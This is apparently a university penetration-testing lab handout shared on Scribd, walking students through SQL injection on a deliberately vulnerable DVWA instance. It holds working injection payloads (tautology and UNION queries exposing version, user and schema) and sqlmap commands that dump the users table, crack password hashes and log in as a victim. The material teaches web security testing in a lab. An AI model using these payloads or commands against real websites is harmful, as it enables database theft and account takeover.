Scribd
Upload
62 views15 pages

M07.02.I.v.2 - SQL Injection

This document provides a detailed lab guide for exploiting a website using SQL injection, a common web exploitation technique. It outlines tasks for setting up a vulnerable web application, executing SQL queries, and using tools like sqlmap to extract database information. The document emphasizes the importance of understanding SQL injection and its implications in web security.

Uploaded by

Ama Ghana
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
62 views15 pages

M07.02.I.v.2 - SQL Injection

This document provides a detailed lab guide for exploiting a website using SQL injection, a common web exploitation technique. It outlines tasks for setting up a vulnerable web application, executing SQL queries, and using tools like sqlmap to extract database information. The document emphasizes the importance of understanding SQL injection and its implications in web security.

Uploaded by

Ama Ghana
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 1

SQL INJECTION
INSTRUCTIONS:
In this lab, you will learn to exploit a website using SQL injection. SQL injection is one of the most widely used
exploitation techniques for web technology. Its importance can be known by OWASP (Open Web Application Security
Project) yearly list. SQL injection can explore the backend database of the website, which occurs mostly due to web
developers' mistakes. SQL injections can be done on various levels with simple to complex SQL commands.

This activity will require the Kali Linux VM for Internet access in vSphere.

PART 1 - GETTING STARTED WITH DVWA


TASKS
Task 1

Start Kali and the Metasploitable2 VMs.

Task 2

On Kali, open Firefox and go to the dvwa website running on Metasploitable http://192.168.10.20/dvwa .

Login in to the the dvwa website with the username (admin) and password (password).

Task 3

In the left-hand column of the DVWA web, scroll down and click on DVWA Security. ​

INFO 2806: Network Attacks, Intrusions and Penetration Testing


INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 2

​ ​

Task 4

In the drop-down menu change the security level to “Low” and click submit. This will make DVWA more vulnerable for
this activity.

INFO 2806: Network Attacks, Intrusions and Penetration Testing


INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 3

Task 5

In the left-side menu, click on Setup / Reset DB.

Scroll to the bottom of the page and click on the “Create / Reset Database” button. This will create the SQL database
needed for this activity. ​

Task 6

In the left-side menu, click on SQL Injection.

INFO 2806: Network Attacks, Intrusions and Penetration Testing


INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 4

Task 7

A database is an organized collection of information and data. Databases usually run on the backend of websites to store
information. For example, Facebook is one big database. Your username, information, all your posts, videos and pictures
are all kept on a backend database. You interact with a database in a few ways. On a website you interact with the
database by clicking on a link or typing in a search box. For example, if you type a friend’s name in the search box in
Facebook, it will look up all the information in the database about your friend and display that information. The same
thing happens when you click on a link to a particular group page in facebook. This initiates a search in the facebook
database and retrieves all the information about that page.

Developers use a query language called SQL (Structured Query Language) in the programming code, so when you use the
search box or click on a link, the SQL code is run and displays the information you requested.

Task 8

Let’s test our database. Navigate to “SQL Injection” from the left-side menu and enter the number “1” (one) in the user
ID field and click “Submit”.

When you click submit you are executing SQL code to look for User ID 1 (one). Below the search field you will see the
result of your search, which shows user ID 1 has a First name of “admin” and a Surname (Last name) of “admin”.

Task 9

A Database is made of rows or records. Below are the first 2 records of the DVWA database we are connected to on this
website.

INFO 2806: Network Attacks, Intrusions and Penetration Testing


INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 5

Notice that the first user_ID (number 1) is admin admin and that the second user_id (number 2) is Gordon Brown. This is
the information in the database that is retrieved when we do a search on the website.

Task 10

Review the SQL code below that is tied to the submit button on the website that retrieves the information from the
database.

"SELECT first_name, last_name FROM users WHERE user_id = '$id'";

Here is an explanation of the code above.

SELECT first_name, last_name - This means select or find the first_name and last_name fields in the database.

FROM users - This means use the database table users. The first_name and last_name fields must be on this table.

WHERE user_id = '$id' - This means search for the user_id entered in the search field. When you enter “1” in the search
field the changes to WHERE user_id = '1' to lookup user_id 1.

; (The semi-colon) - The semi-colon is important because it indicates the end of your SQL query.

Notice the result I get when I run the query and change “user_id = ‘$id’” to “user_id = ‘2’”.

​ SELECT first_name, last_name FROM users WHERE user_id = '2’

Enter the number 2 in the search field on the website and notice how you are retrieving the same user information,
Gordon Brown.

Take a screenshot that you successfully completed this task on the website.

Paste your screenshot on the answer sheet as Screenshot 1.

Task 11

Also, notice that your search for user ID 1 is captured in the url. ​

INFO 2806: Network Attacks, Intrusions and Penetration Testing


INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 6

You can actually manipulate the search results from the url. In the URL field change the “id=2” to “id=3”

​ Change this:

to

What is the user’s First name and Last name for the person associated with ID 3?

Submit your response on the Answer Sheet as Answer 1.

Task 12

We can manipulate the SQL code in the search field to get different results.

But first, use the following Wikipedia link or other online resources to research SQL Injection.

https://en.wikipedia.org/wiki/SQL_injection

In your own words, explain what SQL injection is and why it is able to happen.

Respond on the Answer Sheet as Answer 2.


Task 13

Let’s inject some SQL code into the search field on the website to manipulate our search results to pull all the names in

INFO 2806: Network Attacks, Intrusions and Penetration Testing


INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 7

the database. We do this by injecting SQL code and changing the original SQL query.

In the search field enter the following code exactly as it is below. Be careful that you have all the single quotes exactly as
stated.

​ %’ or ‘1’=’1

Click submit.

How many users are in the database and what are their names?

Respond on the Answer Sheet as Answer 3.

Task 14

We changed the SQL code on the website from:

​ SELECT first_name, last_name FROM users WHERE user_id = '$id'

to:

​ SELECT first_name, last_name FROM users WHERE user_id = '%' or '1'='1';

The percentage % sign does not equal anything and will be false. The '1'='1" query is registered as True since 1 will always
equal 1. Since all the user ids are identified as true, it will list all the names in the database.

Task 15

We can also find the SQL database version. This gives us the opportunity to look up any vulnerabilities the database may
have.

Enter the following into the search field. Be careful to type it exactly.

​ %' or 0=0 union select null, version() #

INFO 2806: Network Attacks, Intrusions and Penetration Testing


INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 8

What is the version of the MariaDB database?

Respond on the Answer Sheet as Answer 4.

Task 16

Inject the following code in the website search field to get more information. Most of the information will be displayed at
the bottom of the search results.

Find the Database user’s login information.

​ %' or 0=0 union select null, user()#

Find the name of the Database.

%' or 0=0 union select null, database()#

Find all the names of the column fields on the users table.

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where
table_name = 'users' #

What is the name of the Database user’s login name?

Respond on the Answer Sheet as Answer 5.

PART 2 - SQLMAP
Task 17

Let’s exploit the information we found to find user login information for the website. We will be using a tool called
sqlmap to assist us through this process.

Before we can begin to use sqlmap we need the cookie session key. Since we are running the website locally on Kali Linux
we will open the developer tools in Firefox to get those keys. Click on the Firefox menu icon in the top-right corner and
click on More Tools. Then click on Web Developer Tools.

INFO 2806: Network Attacks, Intrusions and Penetration Testing


INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 9

Task 18

The developer toolbox will open at the bottom of the browser. Click on Storage from the top toolbox menu and expand
the Cookies listing from the left column menu. ​

INFO 2806: Network Attacks, Intrusions and Penetration Testing


INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 10

Your cookie session will be different from the one in the screenshot above.

Task 19

Reset the database as you have done previously. Then navigate to SQL Injection on the website and make sure everything
is working as expected by entering a 1 in the User ID field and press enter. ​

Go to the url bar and copy the url to use in the sqlmap command.

Task 20

The sqlmap command is lengthy and contains various bits of information. Make sure to construct the sqlmap command
carefully.

1.​ Return to a terminal in Kali or open a new terminal.


2.​ Enter the first part of the command using the url of the website. You can right-click in the terminal then paste.
(Don’t press enter yet)

​ ​ sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#​

INFO 2806: Network Attacks, Intrusions and Penetration Testing


INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 11

3.​ Add a backslash (\) before the ampersand (&) symbol in the url (use the arrow keys to navigate). NOTE: notice
the red backslash below. Make sure not to use a forward slash which is different. ​

​ sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit#​

4.​ Next, add 2 dashes and the word cookie and an equal sign to the command. ​

​ sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie=​

5.​ Copy the cookie information from the Firefox web toolkit and paste it in the command line after “–cookie=”. You
can double-click in the web toolkit to select the cookie data to copy it. Copy the cookie information in the format
below. Your cookie information will be different from this example. Add “security=low” after “cookie=”, then the
PHPSESSID part second, separated by a semi-colon (;).​

​ sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit#
–cookie=security=low; PHPSESSID=ut6uquo9g2qdnekt81366eir4l ​

​ ​

6.​ Add single quotes around the cookie information. See the red quotes below. ​

​ sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit#
–cookie=’security=low; PHPSESSID=ut6uquo9g2qdnekt81366eir4l’ ​

7.​ Finish the command with a single dash and “dbs” (database search). You full command should look similar to
below:​

​ sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit#
–cookie=’security=low; PHPSESSID=ut6uquo9g2qdnekt81366eir4l’ -dbs​

8.​ Once you have verified that your command is correct, press enter to run the command. If the command executes
correctly it should look similar to the screenshot below. ​

INFO 2806: Network Attacks, Intrusions and Penetration Testing


INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 12

The command will run and fill the terminal with text and then stop and prompt you for a question.

Task 21

Notice that sqlmap found that we are running a MYSQL database. ​


We are asked “Do you want to skip test payloads specific for other DBMSes?”. Press “Y” for yes or just press enter,
because we don’t want sqlmap to test for any other database management systems (DBMS). It found MySQL as our
database we are using, we want it to skip all the others. You would answer no, if you were running other databases.

Task 22

Next we are asked if we “want to include all tests for ‘MySQL’ extending provided level (1) and risks (1) values?”. Press
“Y” for yes or just press enter, because we want sqlmap to test MySQL.

Other questions:
“Do you want to keep test the others (if any)?” Answer No.

If you are prompted any other questions just press enter for the default option.

Task 23

If run correctly the sqlmap command should have found 2 databases. What is the name of the first database?

INFO 2806: Network Attacks, Intrusions and Penetration Testing


INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 13

Respond on the Answer Sheet as Answer 6.

Task 24

Let’s find the tables on this database. In the terminal, press the up arrow to repeat the last command so you don’t need
to re-type the whole sqlmap command again. Remove -dbs from the end and replace it with --tables -D dvwa. NOTE:
There are 2 dashes before “tables” and only 1 dash before “D”.

​ sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie=’security=low;


PHPSESSID=ut6uquo9g2qdnekt81366eir4l’ --tables -D dvwa

Take a screenshot of the 2 table names in the dvwa database. ​



Paste your screenshot on the answer sheet as Screenshot 2.

Task 25

Passwords are most likely kept in the users table of the database. Let’s look at the column names of the users table. press
the up arrow to repeat the last command so you don’t need to re-type the whole sqlmap command again. and remove
--tables -D dvwa” and replace it with --columns -D dvwa -T users”. NOTE: There are 2 dashes before “columns” and only
1 dash before “D” and “T”.

​ sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie=’security=low;


PHPSESSID=ut6uquo9g2qdnekt81366eir4l’ --columns -D dvwa -T users

Take a screenshot of the column names on the users table. NOTICE: One of the column names is password.​

Paste your screenshot on the answer sheet as Screenshot 3.

Task 26

Let’s look at all the information in the users tables (including passwords). Use the previous command but replace
“columns” with “dump”.

INFO 2806: Network Attacks, Intrusions and Penetration Testing


INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 14

​ sqlmap -u http://192.168.10.20/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie=’security=low;


PHPSESSID=ut6uquo9g2qdnekt81366eir4l’ --dump -D dvwa -T users

When prompted, “Do you want to store hashes to a temporary file for eventual future processing with other tools?” In
this case we will answer no or press enter for the default. ​

When prompted, “Do you want to crack them via a dictionary-based attack?” Answer yes or press enter for the default.

When asked, “What dictionary do you want to use?”, select 1 or press enter for the default.

When prompted, "Do you want to use common password suffixes?”, answer no or press enter for the default.

sqlmap will now attempt to decrypt the passwords in the database. You should now see the encrypted passwords with
the decrypted password in parentheses.

What is the password for admin? What is the password for pablo?

Respond on the Answer Sheet as Answer 7.

Task 27

Now login as one of the users we have successfully acquired their password. In the left side menu click logout. ​

Then, login as pablo, using the password you obtained in the previous task. Once logged in, scroll to the bottom of the
home screen and take a screenshot to show that you successfully logged in as pablo.

INFO 2806: Network Attacks, Intrusions and Penetration Testing


INFO 2806: NETWORK ATTACKS, INTRUSIONS AND PENETRATION TESTING 15

Paste your screenshot on the answer sheet as Screenshot 4.

PART 3 - REFLECTION
Task 28

This lab manipulated the results of the Database on a website which resulted in information gathering. None of our SQL
injections we did caused any destruction or harm to the website. Research or think about what destructive or harmful
activities that a malicious attacker could do with SQL injection? What would be the result?

Respond on the Answer Sheet as Answer 8.

Task 29

Research what strategies can be used to prevent SQL injection? Write this as recommendations you would give to a
business.

Respond on the Answer Sheet as Answer 9.

INFO 2806: Network Attacks, Intrusions and Penetration Testing

You might also like